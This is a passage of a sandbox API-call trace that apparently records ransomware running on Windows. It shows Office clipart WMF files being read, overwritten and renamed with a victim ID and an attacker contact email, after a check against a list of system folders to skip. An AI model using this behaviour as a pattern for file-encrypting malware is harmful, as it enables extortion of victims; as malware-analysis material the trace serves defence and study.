[0081.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0081.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0081.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0081.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106124.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.642] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5812) returned 1 [0081.642] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16b0) returned 0x205850 [0081.642] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16b0, lpOverlapped=0x0) returned 1 [0081.644] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.644] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16b0, lpOverlapped=0x0) returned 1 [0081.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.644] CloseHandle (hObject=0x314) returned 1 [0081.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0081.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0081.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0081.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0081.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0081.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0081.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.645] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106124.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106124.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0081.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0081.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0081.645] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5bfc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0106146.WMF", cAlternateFileName="")) returned 1 [0081.645] lstrcmpiW (lpString1="J0106146.WMF", lpString2=".") returned 1 [0081.645] lstrcmpiW (lpString1="J0106146.WMF", lpString2="..") returned 1 [0081.645] lstrcmpiW (lpString1="J0106146.WMF", lpString2="...") returned 1 [0081.646] lstrcmpiW (lpString1="J0106146.WMF", lpString2="windows") returned -1 [0081.646] lstrcmpiW (lpString1="J0106146.WMF", lpString2="recovery") returned -1 [0081.646] lstrcmpiW (lpString1="J0106146.WMF", lpString2="perflogs") returned -1 [0081.646] lstrcmpiW (lpString1="J0106146.WMF", lpString2="documents and settings") returned 1 [0081.646] lstrcmpiW (lpString1="J0106146.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.646] lstrcmpiW (lpString1="J0106146.WMF", lpString2="system volume information") returned -1 [0081.646] lstrcmpiW (lpString1="J0106146.WMF", lpString2="msocache") returned -1 [0081.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0081.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106146.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106146.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106146.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0081.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0081.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106146.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106146.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106146.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0081.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0081.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0081.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.646] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23548) returned 1 [0081.646] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5bf0) returned 0x24d210 [0081.647] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5bf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5bf0, lpOverlapped=0x0) returned 1 [0081.649] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.649] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5bf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5bf0, lpOverlapped=0x0) returned 1 [0081.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.650] CloseHandle (hObject=0x314) returned 1 [0081.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0081.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0081.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0081.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0081.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0081.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0081.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.650] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0081.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0081.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0081.651] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0106208.WMF", cAlternateFileName="")) returned 1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2=".") returned 1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2="..") returned 1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2="...") returned 1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2="windows") returned -1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2="recovery") returned -1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2="perflogs") returned -1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2="documents and settings") returned 1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2="system volume information") returned -1 [0081.651] lstrcmpiW (lpString1="J0106208.WMF", lpString2="msocache") returned -1 [0081.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0081.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106208.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106208.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106208.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0081.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106208.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106208.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106208.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0081.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0081.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.652] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11900) returned 1 [0081.652] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e70) returned 0x24d210 [0081.653] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2e70, lpOverlapped=0x0) returned 1 [0081.655] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.655] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2e70, lpOverlapped=0x0) returned 1 [0081.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.655] CloseHandle (hObject=0x314) returned 1 [0081.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0081.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0081.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0081.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0081.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0081.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0081.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.655] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0081.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0081.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0081.656] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0106222.WMF", cAlternateFileName="")) returned 1 [0081.656] lstrcmpiW (lpString1="J0106222.WMF", lpString2=".") returned 1 [0081.656] lstrcmpiW (lpString1="J0106222.WMF", lpString2="..") returned 1 [0081.656] lstrcmpiW (lpString1="J0106222.WMF", lpString2="...") returned 1 [0081.656] lstrcmpiW (lpString1="J0106222.WMF", lpString2="windows") returned -1 [0081.656] lstrcmpiW (lpString1="J0106222.WMF", lpString2="recovery") returned -1 [0081.656] lstrcmpiW (lpString1="J0106222.WMF", lpString2="perflogs") returned -1 [0081.656] lstrcmpiW (lpString1="J0106222.WMF", lpString2="documents and settings") returned 1 [0081.657] lstrcmpiW (lpString1="J0106222.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.657] lstrcmpiW (lpString1="J0106222.WMF", lpString2="system volume information") returned -1 [0081.657] lstrcmpiW (lpString1="J0106222.WMF", lpString2="msocache") returned -1 [0081.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0081.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106222.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106222.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106222.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0081.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0081.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106222.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106222.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106222.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0081.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0081.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0081.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.657] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19600) returned 1 [0081.657] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4c90) returned 0x24d210 [0081.657] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4c90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4c90, lpOverlapped=0x0) returned 1 [0081.660] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.660] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4c90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, 